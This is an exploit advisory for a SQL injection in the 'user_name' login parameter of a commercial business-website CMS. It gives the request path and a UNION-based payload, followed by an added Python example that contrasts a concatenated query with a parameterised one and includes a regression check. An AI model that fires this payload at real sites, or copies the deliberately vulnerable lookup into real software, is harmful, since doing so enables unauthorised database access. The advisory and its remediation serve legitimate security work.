# Exploit Title: The Company Business Website CMS - 'user_name' SQL Injection
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
# Demo Site: 20170502--832559-2888cbce58aab6e518c3.png (490×520)
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A
Exploit:
Code:
----- PoC: SQLi -----
Request: http://localhost/[PATH]/admin/production/login.php
Vulnerable Parameter: user_name (POST)
Payload: user_name=VNfn' UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL-- WMfV&user_password=&loggin=Psop
Exploit address:
https://www.exploit-db.com/exploits/46586
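Added example, not part of the original advisory and not the CMS's own code: the page does not show the source of login.php, so this Python/sqlite3 example uses a hypothetical eight-column `admin_users` table and hypothetical function names to contrast a concatenated `user_name` lookup with a bound-parameter one. The probe is constructed from the shape of the PoC value above with a shortened marker, and `reflects_marker` is a regression check a maintainer can keep after fixing the query.

```python
import sqlite3

MARKER = "qqkxqMARKERqjbbq"  # constructed; shortened form of the PoC's marker
# Constructed probe with the shape of the PoC's user_name value.
PROBE = ("VNfn' UNION ALL SELECT NULL,NULL,NULL,'" + MARKER +
         "',NULL,NULL,NULL,NULL-- WMfV")


def make_db():
    """In-memory stand-in for the CMS database (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    # Eight columns, the count the PoC's UNION implies for the login query.
    db.execute("CREATE TABLE admin_users (id INTEGER PRIMARY KEY, c2, c3, "
               "user_name TEXT, user_password TEXT, c6, c7, c8)")
    db.execute("INSERT INTO admin_users (user_name, user_password) "
               "VALUES (?, ?)", ("admin", "constructed-hash"))
    return db


def find_user_concat(db, user_name):
    """Vulnerable pattern: request data becomes part of the SQL text."""
    sql = "SELECT * FROM admin_users WHERE user_name = '" + user_name + "'"
    return db.execute(sql).fetchone()


def find_user_bound(db, user_name):
    """Hardened pattern: the value is bound and only ever compared as data."""
    sql = "SELECT * FROM admin_users WHERE user_name = ?"
    return db.execute(sql, (user_name,)).fetchone()


def reflects_marker(lookup, db):
    """Regression check: True if the probe makes the lookup return the marker."""
    row = lookup(db, PROBE)
    return row is not None and MARKER in row


if __name__ == "__main__":
    db = make_db()
    for lookup in (find_user_concat, find_user_bound):
        print(lookup.__name__, "injectable:", reflects_marker(lookup, db))
```

In the PHP application the equivalent change is a prepared statement (PDO or mysqli) with the `user_name` value bound instead of concatenated into the query string.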
